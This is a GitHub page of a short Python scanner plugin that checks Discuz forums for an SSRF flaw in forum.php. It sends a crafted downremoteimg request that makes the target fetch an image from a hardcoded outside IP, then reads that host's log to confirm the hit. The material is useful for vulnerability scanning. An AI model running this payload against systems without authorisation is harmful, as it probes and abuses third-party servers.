forked from muYoz/xunfeng_vul_poc
-
Notifications
You must be signed in to change notification settings - Fork 0
/
discuz_SSRF.py
39 lines (36 loc) · 1.45 KB
/
discuz_SSRF.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
# coding=utf-8
import time
import hashlib
import datetime
import requests
def get_plugin_info():
plugin_info = {
"name": "Discuz SSRF漏洞",
"info": "Discuz论坛forum.php参数message SSRF漏洞,trs infogate插件 blind XML实体注入",
"level": "中危",
"type": "SSRF",
"author": "muYoz@bg",
"url": "https://github.com/Lucifer1993/AngelSword/blob/master/cms/discuz/discuz_forum_message_ssrf.py",
"keyword": "tag:php",
"source": 1
}
return plugin_info
def check(ip, port, timeout=10):
url = ip + ':' + port
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
}
time_stamp = time.mktime(datetime.datetime.now().timetuple())
m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
md5_str = m.hexdigest()
payload = "/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://45.76.158.91:6868/" + md5_str + ".jpg[/img]&formhash=09cec465"
vulnurl = url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
eye_url = "http://45.76.158.91/web.log"
time.sleep(6)
reqr = requests.get(eye_url, timeout=timeout, verify=False)
if md5_str in reqr.text:
return u"存在discuz论坛forum.php参数message SSRF漏洞"
except:
pass